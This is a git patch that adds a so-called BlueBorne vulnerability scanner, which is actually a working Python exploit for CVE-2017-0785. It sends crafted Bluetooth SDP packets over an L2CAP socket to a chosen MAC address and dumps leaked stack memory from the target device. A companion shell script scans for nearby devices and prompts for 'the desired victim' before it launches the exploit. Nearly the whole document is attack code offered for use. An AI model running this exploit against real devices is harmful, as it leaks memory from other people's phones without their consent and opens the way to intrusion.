From 934254059fe6e75615747bf2cfcc4f52c07441e7 Mon Sep 17 00:00:00 2001 From: Navan Chauhan Date: Mon, 2 Oct 2017 21:10:16 +0530 Subject: Files Added --- README.md | 1 + main.py | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++++ scanner.sh | 8 ++++++++ 3 files changed, 62 insertions(+) create mode 100644 README.md create mode 100644 main.py create mode 100644 scanner.sh diff --git a/README.md b/README.md new file mode 100644 index 0000000..9831cc3 --- /dev/null +++ b/README.md @@ -0,0 +1 @@ +# Blueborne-Vulnerability-Scanner diff --git a/main.py b/main.py new file mode 100644 index 0000000..9e861e7 --- /dev/null +++ b/main.py @@ -0,0 +1,53 @@ +from pwn import * +import bluetooth + +if not 'TARGET' in args: + log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX") + exit() + +target = args['TARGET'] +service_long = 0x0100 +service_short = 0x0001 +mtu = 50 +n = 30 + +def packet(service, continuation_state): + pkt = '\x02\x00\x00' + pkt += p16(7 + len(continuation_state)) + pkt += '\x35\x03\x19' + pkt += p16(service) + pkt += '\x01\x00' + pkt += continuation_state + return pkt + +p = log.progress('Exploit') +p.status('Creating L2CAP socket') + +sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) +bluetooth.set_l2cap_mtu(sock, mtu) +context.endian = 'big' + +p.status('Connecting to target') +sock.connect((target, 1)) + +p.status('Sending packet 0') +sock.send(packet(service_long, '\x00')) +data = sock.recv(mtu) + +if data[-3] != '\x02': + log.error('Invalid continuation state received.') + +stack = '' + +for i in range(1, n): + p.status('Sending packet %d' % i) + sock.send(packet(service_short, data[-3:])) + data = sock.recv(mtu) + stack += data[9:-3] + +sock.close() + +p.success('Done') + +print hexdump(stack) + diff --git a/scanner.sh b/scanner.sh new file mode 100644 index 0000000..485db04 --- /dev/null +++ b/scanner.sh @@ -0,0 +1,8 @@ +#!/bin/bash +hcitool scan +echo "Enter The Mac Adress of the desired victim" +read targer +clear +echo "Scanning" +clear +python main.py TARGET=$targer -- cgit v1.2.3